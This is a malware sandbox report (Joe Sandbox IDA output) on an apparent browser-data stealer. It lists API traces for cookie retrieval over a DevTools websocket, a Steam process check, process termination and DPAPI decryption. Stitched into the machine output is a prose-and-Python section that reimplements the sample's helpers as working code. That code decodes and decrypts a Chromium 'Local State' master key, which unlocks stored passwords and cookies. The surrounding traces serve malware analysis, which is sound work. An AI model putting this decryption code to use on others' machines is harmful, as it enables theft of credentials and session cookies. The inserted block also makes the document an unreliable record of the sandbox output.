                              • Opcode ID: ca1b9e376f347caa494af468f97ff23b9ce58772bbd637ff55ccad693a95d6b3
                              • Instruction ID: 12755d3efac3abd4d4d37ebce8a4c408e732f629df63507a7111e641435574bc
                              • Opcode Fuzzy Hash: ca1b9e376f347caa494af468f97ff23b9ce58772bbd637ff55ccad693a95d6b3
                              • Instruction Fuzzy Hash: 47617371910519AFCF25EF74DC88EEE77B8EF59300F0044A8E54AA7251DB34AA58CF90
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                              • API String ID: 909987262-758292691
                              • Opcode ID: cede120412e79b39a344fc285e3b575b7e642e44be41da67ebb61509d3458735
                              • Instruction ID: e0e674b711dbb6658770380e57a75b966d77e8beaa56e16b878299faf818c4f8
                              • Opcode Fuzzy Hash: cede120412e79b39a344fc285e3b575b7e642e44be41da67ebb61509d3458735
                              • Instruction Fuzzy Hash: B1A26971E012699FDF21DFA8C880BEDBBB6BF48304F1485A9D609A7641DB705E85CF90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A23D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A2402
                              • lstrlen.KERNEL32(\*.*), ref: 003A240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 003A2436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A2486
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: b3a7832161047b1fcb10a21110b0e79d5b36212d01f8ae2f4f41f02df0d6c42a
                              • Instruction ID: d0d1bb37d2db5da67252bab9e29f87a40fe6bd287551079b58b8257e883a8058
                              • Opcode Fuzzy Hash: b3a7832161047b1fcb10a21110b0e79d5b36212d01f8ae2f4f41f02df0d6c42a
                              • Instruction Fuzzy Hash: 67415E32512A19ABCF33EF29DC8AE9F77A4EF15304F055164F84A9B252CF349C158B94
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003B46B9
                              • Process32First.KERNEL32(00000000,00000128), ref: 003B46C9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B46DB
                              • StrCmpCA.SHLWAPI(?,?), ref: 003B46ED
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B4702
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B4711
                              • CloseHandle.KERNEL32(00000000), ref: 003B4718
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B4726
                              • CloseHandle.KERNEL32(00000000), ref: 003B4731
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: a40d5d74709caf1f523850a598a16bd833d6ce8371eb256d31269c9d8bb1d28a
                              • Instruction ID: 79a5a39ab2ce0c030aa0bc7451dce82cbbb166c1dc8a4cf046e71d9ba3f09038
                              • Opcode Fuzzy Hash: a40d5d74709caf1f523850a598a16bd833d6ce8371eb256d31269c9d8bb1d28a
                              • Instruction Fuzzy Hash: 0501D232601524AFE7215B60DC8DFFA377CEB99B05F000088FA05E1180EF749989EBA5
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 003B4628
                              • Process32First.KERNEL32(00000000,00000128), ref: 003B4638
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B464A
                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 003B4660
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B4672
                              • CloseHandle.KERNEL32(00000000), ref: 003B467D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                              • String ID: steam.exe
                              • API String ID: 2284531361-2826358650
                              • Opcode ID: 736069d192670cbf737aec108af9b598e4a2c846c2dba3a88f6ba5d3cd72a29e
                              • Instruction ID: 2a92ac13eb28b8f28aa40ea42f99a3f79736704df8ff0f8606328744c85784f0
                              • Opcode Fuzzy Hash: 736069d192670cbf737aec108af9b598e4a2c846c2dba3a88f6ba5d3cd72a29e
                              • Instruction Fuzzy Hash: 1701AD716015289FD721AB60AC4DFEA77BCEF19350F0001D9EE08E1040EF74DA989BE5
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4B7F
                              • lstrlen.KERNEL32(003C4CA8), ref: 003A4B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BA7
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A4BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A4BFA
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID:
                              • API String ID: 2567437900-0
                              • Opcode ID: 8b71c0e76cadf0997c533d2a3e35cb773cb73e465d9e9732d4b67d34ea55d263
                              • Instruction ID: 1127d08028988e992b2430a66cf1cb3ae6066d4a37be7743382af08208bddbda
                              • Opcode Fuzzy Hash: 8b71c0e76cadf0997c533d2a3e35cb773cb73e465d9e9732d4b67d34ea55d263
                              • Instruction Fuzzy Hash: 5E311B32522916ABCB23EF64EC8AE9F77A5AF91700F051124F8459B251CB70DC158BA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =S4($N@F*$ZO$^X:$_k|$}~q$8C.$Raw
                              • API String ID: 0-4080121987
                              • Opcode ID: abe10358037ca5a2e5757005ce1ca3b466d5d1d7647f3165d7d3956489612c2a
                              • Instruction ID: 431a41740620edad04d188ee48c690769cd340c3744637c9ec6d3ccadb07e29c
                              • Opcode Fuzzy Hash: abe10358037ca5a2e5757005ce1ca3b466d5d1d7647f3165d7d3956489612c2a
                              • Instruction Fuzzy Hash: 15B2F8F360C204AFE304AE2DEC4566ABBE5EFD4720F16893DEAC4C3744E63598158697
                              APIs
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003B2D9B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B2DAD
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003B2DBA
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003B2DEC
                              • LocalFree.KERNEL32(00000000), ref: 003B2FCA
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: !c"d$.lvo$Obn#$ResY$Rq.k$cl;O$ok
                              • API String ID: 0-3884299317
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2C42
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B2C49
                              • GetTimeZoneInformation.KERNEL32(?), ref: 003B2C58
                              • wsprintfA.USER32 ref: 003B2C83
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID: wwww
                              • API String ID: 3317088062-671953474
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 003B1B72
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B184F
                                • Part of subcall function 003B1820: lstrlen.KERNEL32(00F16E90), ref: 003B1860
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B1887
                                • Part of subcall function 003B1820: lstrcat.KERNEL32(00000000,00000000), ref: 003B1892
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B18C1
                                • Part of subcall function 003B1820: lstrlen.KERNEL32(003C4FA0), ref: 003B18D3
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B18F4
                                • Part of subcall function 003B1820: lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B1900
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B192F
                              • sscanf.NTDLL ref: 003B1B9A
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 003B1BB6
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 003B1BC6
                              • ExitProcess.KERNEL32 ref: 003B1BE3
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                              • String ID:
                              • API String ID: 3040284667-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0039775E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00397765
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0039778D
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003977AD
                              • LocalFree.KERNEL32(?), ref: 003977B7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              APIs
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003B3A96
                              • Process32First.KERNEL32(00000000,00000128), ref: 003B3AA9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B3ABF
                                • Part of subcall function 003B7310: lstrlen.KERNEL32(------,00395BEB), ref: 003B731B
                                • Part of subcall function 003B7310: lstrcpy.KERNEL32(00000000), ref: 003B733F
                                • Part of subcall function 003B7310: lstrcat.KERNEL32(?,------), ref: 003B7349
                                • Part of subcall function 003B7280: lstrcpy.KERNEL32(00000000), ref: 003B72AE
                              • CloseHandle.KERNEL32(00000000), ref: 003B3BF7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0039EA76
                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0039EA7E
                              • lstrcat.KERNEL32(003BCFEC,003BCFEC), ref: 0039EB27
                              • lstrcat.KERNEL32(003BCFEC,003BCFEC), ref: 0039EB49
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              APIs
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003B40CD
                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003B40DC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B40E3
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 003B4113
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: BinaryCryptHeapString$AllocateProcess
                              • String ID:
                              • API String ID: 3825993179-0
                              APIs
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B3B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00399B4A
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B61
                              • LocalFree.KERNEL32 ref: 00399B70
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 6dc51ef0922e5a702a0172ce2ad6382a59843e93d2f6eb787f204956957f3689
                              • Instruction ID: a128f4963679e1cfeac8e7df350788ade1d0638200c5710aafccbb671a16f136
                              • Opcode Fuzzy Hash: 6dc51ef0922e5a702a0172ce2ad6382a59843e93d2f6eb787f204956957f3689
                              • Instruction Fuzzy Hash: FBF01D70340712AFEB311F69AC4EF567BA8EF14B50F250115FA45EA2D0D7B59844CAA4
                              APIs
                              • CoCreateInstance.COMBASE(003BB110,00000000,00000001,003BB100,?), ref: 003ACB06
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003ACB46
                              • lstrcpyn.KERNEL32(?,?,00000104), ref: 003ACBC9
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                              • String ID:
                              • API String ID: 1940255200-0
                              • Opcode ID: c281f0df708efd594d79e67bf5ac016c2242d52c203ed359b2b53c51d63702db
                              • Instruction ID: f27638604731b7e9c9a570a856b384d58109ef60ee505461e664c5a2dda22a3f
                              • Opcode Fuzzy Hash: c281f0df708efd594d79e67bf5ac016c2242d52c203ed359b2b53c51d63702db
                              • Instruction Fuzzy Hash: 0E317871A40614BFD711DB98CC96FEAB7B9DB88B14F104184FA04EB2D0D7B1AD44CBA0
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00399B9F
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00399BB3
                              • LocalFree.KERNEL32(?), ref: 00399BD7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 2fcfe0d6373a4ce057314b31edc290dad3687c734d11c2bb4543562d55a38d0e
                              • Instruction ID: 6f35c391deb14dfaebb41db2120dcd50807f92af137de6a279d7538b04d3406c
                              • Opcode Fuzzy Hash: 2fcfe0d6373a4ce057314b31edc290dad3687c734d11c2bb4543562d55a38d0e
                              • Instruction Fuzzy Hash: 510112B5E41309AFD7109BA4DC49FAEB778EB44700F104559EA04AB280D7B49904C7E5
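The two helpers listed above sit back to back in the unpacked image: the first (ref 00399B3B/00399B61) calls CryptStringToBinaryA with flag 0x1 (CRYPT_STRING_BASE64) twice, once with a NULL output buffer to size the result and once after LocalAlloc(0x40 = LPTR, size) to decode into it; the second (ref 00399B9F) hands a blob to CryptUnprotectData with NULL entropy and prompt arguments and releases the API-allocated output with LocalFree. The example below is an added illustration of that chain, not code from the report or recovered from the sample. It reproduces the sequence as a forensic helper in Python; applying it to a Chromium "Local State" os_crypt.encrypted_key (base64 text carrying a "DPAPI" prefix ahead of the CryptProtectData blob) is an assumption about what the stealer uses the pair for, which the report does not state. The Local State document and blob header used as input are constructed, not taken from the sample.

```python
# Added example: mirrors the base64-decode + CryptUnprotectData helper pair seen in
# the sample. Chromium "Local State" handling is an assumption, not something the
# report confirms.
import base64
import ctypes
import json
import platform

CRYPT_STRING_BASE64 = 0x00000001  # flag value in the CryptStringToBinaryA calls above
LPTR = 0x0040                     # LocalAlloc flags in the LocalAlloc calls above
DPAPI_PREFIX = b"DPAPI"           # prefix Chromium puts before the blob (assumption)
# A CryptProtectData blob starts with dwVersion == 1 followed by the provider GUID
# {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB} in little-endian byte order.
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def base64_to_binary(text: str) -> bytes:
    """Equivalent of the first helper (CryptStringToBinaryA, CRYPT_STRING_BASE64).

    The native routine calls the API once with a NULL output buffer to learn the
    size, allocates with LocalAlloc(LPTR, size) and calls it again to decode.
    Python's base64 module sizes the output itself, so a single call suffices;
    whitespace is stripped first so line-wrapped input also decodes.
    """
    return base64.b64decode("".join(text.split()), validate=True)


def is_dpapi_blob(blob: bytes) -> bool:
    """Structural check: does this look like CryptProtectData output?"""
    return blob.startswith(DPAPI_BLOB_MAGIC)


def split_master_key_blob(local_state_json: str) -> bytes:
    """Pull os_crypt.encrypted_key out of a Chromium Local State document,
    base64-decode it and strip the 'DPAPI' prefix, returning the raw blob that
    would be passed to CryptUnprotectData (layout is the assumed Chromium one)."""
    state = json.loads(local_state_json)
    encoded = state["os_crypt"]["encrypted_key"]
    blob = base64_to_binary(encoded)
    if not blob.startswith(DPAPI_PREFIX):
        raise ValueError("encrypted_key does not carry the expected DPAPI prefix")
    return blob[len(DPAPI_PREFIX):]


def dpapi_unprotect(blob: bytes) -> bytes:
    """Equivalent of the second helper: CryptUnprotectData(&in, NULL, NULL, NULL,
    NULL, 0, &out) followed by LocalFree(out.pbData), the argument shape seen at
    00399B9F / 00399BD7. Windows only, and only for the user who protected the data."""
    if platform.system() != "Windows":
        raise OSError("CryptUnprotectData is only available on Windows")
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD), ("pbData", ctypes.c_void_p)]

    crypt32 = ctypes.WinDLL("crypt32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.LocalFree.argtypes = [ctypes.c_void_p]  # keep 64-bit pointers intact
    kernel32.LocalFree.restype = ctypes.c_void_p
    in_buf = ctypes.create_string_buffer(blob, len(blob))
    in_blob = DATA_BLOB(len(blob), ctypes.addressof(in_buf))
    out_blob = DATA_BLOB()
    if not crypt32.CryptUnprotectData(ctypes.byref(in_blob), None, None, None,
                                      None, 0, ctypes.byref(out_blob)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        return ctypes.string_at(out_blob.pbData, out_blob.cbData)
    finally:
        kernel32.LocalFree(out_blob.pbData)  # output buffer is LocalAlloc'd by the API


def recover_master_key(local_state_json: str) -> bytes:
    """The full chain the two helpers implement when called one after the other."""
    return dpapi_unprotect(split_master_key_blob(local_state_json))


# Constructed sample input: a Local State fragment whose encrypted_key wraps only
# the 20-byte DPAPI blob header, so it is structurally valid but not decryptable.
SAMPLE_RAW_BLOB = DPAPI_BLOB_MAGIC
SAMPLE_LOCAL_STATE = json.dumps({
    "os_crypt": {"encrypted_key": base64.b64encode(DPAPI_PREFIX + SAMPLE_RAW_BLOB).decode()}
})

if __name__ == "__main__":
    raw = split_master_key_blob(SAMPLE_LOCAL_STATE)
    print("DPAPI blob:", raw.hex(), "structurally valid:", is_dpapi_blob(raw))
    if platform.system() == "Windows":
        try:
            print("master key:", recover_master_key(SAMPLE_LOCAL_STATE).hex())
        except OSError as exc:
            print("CryptUnprotectData failed (expected for the constructed header):", exc)
```

For triage the useful signal is the pairing itself: CryptStringToBinaryA followed immediately by CryptUnprotectData with no entropy argument is the shape of code that decrypts another application's stored secrets under the current user's DPAPI key, which is why this function is worth naming before anything else in the dump.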
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
